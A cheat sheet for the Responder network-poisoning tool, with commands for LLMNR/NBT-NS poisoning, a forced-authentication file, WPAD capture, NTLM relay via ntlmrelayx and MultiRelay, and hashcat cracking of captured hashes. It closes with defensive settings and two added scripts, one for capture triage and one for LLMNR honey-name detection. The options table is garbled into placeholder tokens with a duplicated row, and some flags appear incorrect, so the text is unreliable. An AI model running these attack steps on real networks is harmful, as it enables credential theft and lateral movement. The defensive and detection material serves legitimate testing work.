# Responder Cheat Sheet
## Overview
Responder is a powerful LLMNR (Link-Local Multicast Name Resolution), NBT-NS (NetBIOS Name Service) and mDNS (Multicast DNS) poisoner. It is designed to respond to specific network name-resolution queries and includes built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers that support NTLMv1/NTLMv2/LMv2 authentication.
**Warning:** Responder is a security testing tool that should only be used in environments where you have explicit permission to do so.
## Installation
### Using apt
```bash
# Update package list
sudo apt update
# Install if not already installed
sudo apt install responder
```
### From GitHub
```bash
# Clone the repository
git clone https://github.com/lgandx/Responder
# Navigate to the directory
cd Responder
# Make the Python script executable
chmod +x Responder.py
```
### Using pip
```bash
# Install using pip
pip install Responder
```
## Basic Usage
### Starting Responder
```bash
# Basic usage with interface specification
responder -I eth0
# Start with all options enabled
responder -I eth0 -wrf
# Analyze mode (passive)
responder -I eth0 -A
```
## Command-Line Options
|Option|Description|
|--------|-------------|
|__INLINE_CODE_21__|Show help message and exit|
|__INLINE_CODE_22__|Analyze mode. Do not poison any requests, just analyze traffic|
|__INLINE_CODE_23__|Network interface to use|
|__INLINE_CODE_24__|IP address to bind to|
|__INLINE_CODE_25__|External IP address (for DHCP options)|
|__INLINE_CODE_26__|Return a Basic HTTP authentication. Default: NTLM|
|__INLINE_CODE_27__|Enable answers for netbios wredir suffix queries|
|__INLINE_CODE_28__|Enable answers for netbios domain suffix queries|
|__INLINE_CODE_29__|Fingerprint hosts that issued an NBT-NS or LLMNR query|
|__INLINE_CODE_30__|Start the WPAD rogue proxy server|
|__INLINE_CODE_31__|Upstream HTTP proxy used by the rogue WPAD proxy|
|__INLINE_CODE_32__|Force NTLM/Basic authentication on wpad.dat file retrieval|
|__INLINE_CODE_33__|Force NTLM/Basic authentication for any proxy request|
|__INLINE_CODE_34__|Force LM hashing downgrade for Windows XP/2003 and earlier|
|__INLINE_CODE_35__|Increase verbosity|
|__INLINE_CODE_36__|Log to file in addition to console|
|__INLINE_CODE_37__|Do not log to syslog|
|__INLINE_CODE_38__|Do not log to stdout|
|__INLINE_CODE_39__|Path to configuration file|
|__INLINE_CODE_40__|Enable/disable specific server (HTTP, SMB, etc.)|
|__INLINE_CODE_41__|Enable the MSSQL server|
|__INLINE_CODE_42__|Enable the MSSQL server|
|__INLINE_CODE_43__|Enable the HTTPS server|
|__INLINE_CODE_44__|Enable the HTTP server|
|__INLINE_CODE_45__|Enable the SMB server|
|__INLINE_CODE_46__|Enable the FTP server|
|__INLINE_CODE_47__|Enable the IMAP server|
|__INLINE_CODE_48__|Enable the POP server|
|__INLINE_CODE_49__|Enable the SMTP server|
|__INLINE_CODE_50__|Enable the LDAP server|
|__INLINE_CODE_51__|Enable the DNS server|
## Configuration File
The configuration file is located at __INLINE_CODE_52_ or in the Responder directory as `Responder.conf`.
### Key Configuration Options
```ini
[Responder Core]
; Set to On or Off to enable or disable features
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
```
## Attack Scenarios
### Basic LLMNR/NBT-NS Poisoning
```bash
# Start Responder with default settings
responder -I eth0 -v
# Wait for authentication attempts
# Hashes will be saved in the logs directory
```
### Forced Authentication via UNC Path
```bash
# Create a file with a UNC path
echo "file://<non-existent-share>/test.txt" > malicious.url
# Start Responder
responder -I eth0 -v
# When the victim opens the file, their system will attempt to authenticate
# Responder will capture the hash
```
### WPAD Attack
```bash
# Start Responder with WPAD enabled
responder -I eth0 -w -v
# When a victim's browser requests a WPAD configuration file
# Responder will respond and capture authentication attempts
```
### Relay Attack Setup
```bash
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb
# In another terminal, run ntlmrelayx
ntlmrelayx.py -t <target_ip> -smb2support
```
## Hash Capture and Cracking
### Viewing Captured Hashes
```bash
# View captured hashes
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt
# Format of captured hash
# USERNAME::DOMAIN:challenge:NTLM response:other data
```
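The line layout shown above is what an analyst parses when triaging a Responder log directory after an engagement or an incident. The following is an added example, not code from the Responder project: it validates each line against the NTLMv1 and NTLMv2 field lengths, keeps one line per account (Responder logs every attempt, so accounts repeat), and reports which hashcat mode each group needs using the mode numbers given in the cracking section. The sample lines are constructed filler, not real captures.

```python
"""Triage a Responder capture file: validate each NetNTLM line and pick the
matching hashcat mode (5600 for NTLMv2, 5500 for NTLMv1).

Added example, not code from the Responder project. It assumes the line
layout USERNAME::DOMAIN:challenge:NTLM response:other data shown above and
tells the two formats apart by field length. Sample lines are constructed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

HEX = re.compile(r"^[0-9a-fA-F]+$")


@dataclass(frozen=True)
class NetNtlmRecord:
    user: str
    domain: str
    challenge: str   # 16 hex chars: the 8-byte server challenge
    response: str    # NTLMv2: 32 hex NTProofStr; NTLMv1: 48 hex NT response
    extra: str       # NTLMv2: client blob; NTLMv1: LM response
    version: int     # 1 or 2


def parse_line(line: str) -> NetNtlmRecord:
    """Parse one capture line; raise ValueError on anything malformed."""
    fields = line.strip().split(":")
    if len(fields) != 6 or fields[1] != "":
        raise ValueError(f"expected USER::DOMAIN:f3:f4:f5, got {line!r}")
    user, _, domain, f3, f4, f5 = fields
    if not user or not all(HEX.match(f) for f in (f3, f4, f5)):
        raise ValueError(f"non-hex field in {line!r}")
    # NTLMv2: user::domain:challenge(16):NTProofStr(32):blob(variable)
    if len(f3) == 16 and len(f4) == 32:
        return NetNtlmRecord(user, domain, f3, f4, f5, 2)
    # NTLMv1: user::domain:LMresponse(48):NTresponse(48):challenge(16)
    if len(f3) == 48 and len(f4) == 48 and len(f5) == 16:
        return NetNtlmRecord(user, domain, f5, f4, f3, 1)
    raise ValueError(f"field lengths match neither NTLMv1 nor NTLMv2: {line!r}")


def hashcat_mode(rec: NetNtlmRecord) -> int:
    """Mode numbers as listed in the cracking section of this sheet."""
    return 5600 if rec.version == 2 else 5500


def triage(lines):
    """Group well-formed lines by hashcat mode, one line per account.
    Returns (by_mode, bad): by_mode maps 5500/5600 -> [line, ...],
    bad holds the lines that did not parse."""
    by_mode = defaultdict(list)
    seen = set()
    bad = []
    for line in lines:
        if not line.strip():
            continue
        try:
            rec = parse_line(line)
        except ValueError:
            bad.append(line)
            continue
        key = (rec.version, rec.domain.lower(), rec.user.lower())
        if key in seen:
            continue
        seen.add(key)
        by_mode[hashcat_mode(rec)].append(line.strip())
    return dict(by_mode), bad


# Constructed sample lines (hex payloads are filler, not real responses).
SAMPLE_V2 = "alice::CORP:1122334455667788:" + "ab" * 16 + ":" + "cd" * 40
SAMPLE_V1 = "bob::CORP:" + "11" * 24 + ":" + "22" * 24 + ":1122334455667788"
SAMPLE_BAD = "carol::CORP:not-hex:zz:1"

if __name__ == "__main__":
    grouped, rejected = triage([SAMPLE_V2, SAMPLE_V2, SAMPLE_V1, SAMPLE_BAD])
    for mode, entries in grouped.items():
        print(f"hashcat -m {mode}: {len(entries)} unique account(s)")
    print(f"rejected {len(rejected)} malformed line(s)")
```

The per-account list is also the list of credentials that need to be reset once the engagement or incident is over, which is why duplicates are collapsed rather than counted.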
### Cracking with Hashcat
```bash
# Crack NTLMv2 hashes with hashcat
hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt /path/to/wordlist
# Crack NTLMv1 hashes with hashcat
hashcat -m 5500 /usr/share/responder/logs/SMB-NTLMv1-SSP-<IP>.txt /path/to/wordlist
```
## Advanced Techniques
### Using Responder with MultiRelay
```bash
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb
# In another terminal, run MultiRelay
cd Responder/tools
python3 MultiRelay.py -t <target_ip> -u ALL
```
### Poisoning Specific Hosts
```bash
# Create a file with target IPs
echo "192.168.1.10" > targets.txt
# Start Responder with target file
responder -I eth0 -v -e targets.txt
```
### Custom Challenge Value
```bash
# Edit Responder.conf and set a custom challenge
# [Responder Core]
# Challenge = 1122334455667788
```
## Defensive Measures
### Disabling LLMNR via Group Policy
1. Open the Group Policy Editor
2. Navigate to Computer Configuration > Administrative Templates > Network > DNS Client
3. Enable "Turn off Multicast Name Resolution"
### Disabling NBT-NS via Command Line
```cmd
:: Disable NetBIOS over TCP/IP on every IP-enabled adapter (Windows, elevated prompt).
:: SetTcpipNetbios argument: 0 = use DHCP setting, 1 = enable, 2 = disable
wmic nicconfig where "IPEnabled=true" call SetTcpipNetbios 2
```
### Disabling NBT-NS via Registry
For each adapter, set `NetbiosOptions` to `2` (disabled) under `HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_{<adapter GUID>}`.
## Detecting Responder Activity
- Monitor for suspicious LLMNR/NBT-NS responses
- Look for multiple services running on the same IP
- Check for unusual authentication attempts
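One concrete form of the first check above, as an added example that is not part of the original page or of Responder: a poisoner answers names it sees on the wire, so an LLMNR query for a random name that cannot exist on the segment should draw no reply, and any host that does reply is flagged. The multicast group and port are LLMNR's own (224.0.0.252, UDP 5355); the `honey-` bait prefix and the two-second timeout are arbitrary choices, and the packet builder and parser are pure functions that can be exercised offline.

```python
"""Honey-name LLMNR probe: query names that cannot exist and report any host
that answers them.

Added example, not part of Responder or of this page. Assumes LLMNR over
IPv4 and that the host running it sits on the segment being checked.
"""
import random
import secrets
import socket
import struct
import time

LLMNR_GROUP = "224.0.0.252"
LLMNR_PORT = 5355
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """DNS wire-format name: length-prefixed labels plus a zero terminator."""
    labels = name.strip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def build_llmnr_query(name: str, txid: int) -> bytes:
    """LLMNR reuses the DNS header and question layout; flags are 0 for a query."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def _read_name(data: bytes, off: int):
    """Read a possibly compressed name; return (name, offset after it)."""
    labels, end, hops = [], None, 0
    while True:
        length = data[off]
        if length & 0xC0 == 0xC0:            # compression pointer
            if end is None:
                end = off + 2
            off = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            hops += 1
            if hops > 16:
                raise ValueError("pointer loop")
            continue
        off += 1
        if length == 0:
            break
        labels.append(data[off:off + length].decode("ascii", "replace"))
        off += length
    return ".".join(labels), (end if end is not None else off)


def parse_llmnr_response(data: bytes, txid: int, expected_name: str) -> list:
    """A-record addresses from a response to our query (same id, QR bit set,
    same question name); [] for anything else, including malformed input."""
    if len(data) < 12:
        return []
    rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000 or an == 0:
        return []
    try:
        off, qname = 12, None
        for _ in range(qd):
            qname, off = _read_name(data, off)
            off += 4                                     # qtype + qclass
        if qname is None or qname.lower() != expected_name.lower():
            return []
        ips = []
        for _ in range(an):
            _, off = _read_name(data, off)
            rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])
            off += 10
            rdata = data[off:off + rdlen]
            off += rdlen
            if rtype == QTYPE_A and rdlen == 4:
                ips.append(socket.inet_ntoa(rdata))
        return ips
    except (IndexError, struct.error, ValueError):
        return []                                        # truncated or malformed


def probe(names, timeout: float = 2.0):
    """Send one query per bait name; return (name, sender, answered_ip) hits."""
    hits = []
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)
    sock.settimeout(timeout)
    try:
        for name in names:
            txid = random.randrange(1, 0x10000)
            sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
            deadline = time.monotonic() + timeout
            while time.monotonic() < deadline:
                try:
                    data, (src, _) = sock.recvfrom(4096)
                except socket.timeout:
                    break
                for ip in parse_llmnr_response(data, txid, name):
                    hits.append((name, src, ip))
    finally:
        sock.close()
    return hits


if __name__ == "__main__":
    bait = ["honey-" + secrets.token_hex(4) for _ in range(3)]   # cannot exist
    found = probe(bait)
    if not found:
        print("no LLMNR answers to bogus names")
    for name, src, ip in found:
        print(f"ALERT: {src} answered LLMNR for bogus name {name!r} with {ip}")
```

Only responses carrying the transaction id of the query just sent and echoing its question name count as hits, so stray LLMNR traffic on a busy segment does not produce false alerts; a legitimate host never answers a name it does not own.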
## Troubleshooting
### Common Issues
1. **Port conflicts**
   ```bash
   # Check if the ports Responder needs are already in use
   netstat -tuln | grep -E ':(445|80|53) '
   # Kill conflicting processes
   sudo kill <pid>
   ```
2. **Interface not found**
   ```bash
   # List available interfaces
   ip a
   # Use the correct interface name
   responder -I <interface>
   ```
3. **Permission issues**
   ```bash
   # Run with sudo
   sudo responder -I eth0
   ```
4. **No hashes captured**
   ```bash
   # Check if Responder is running in analyze mode
   # Ensure the network allows the required traffic
   # Try forcing authentication with UNC paths
   ```
## Resources
- [Official GitHub Repository](https://github.com/lgandx/Responder)
- MITRE ATT&CK - LLMNR/NBT-NS Poisoning
- Kali Linux Tools - Responder
---
*This cheat sheet provides a comprehensive reference for using Responder in security testing scenarios. Always make sure you have proper authorization before using this tool in any environment.*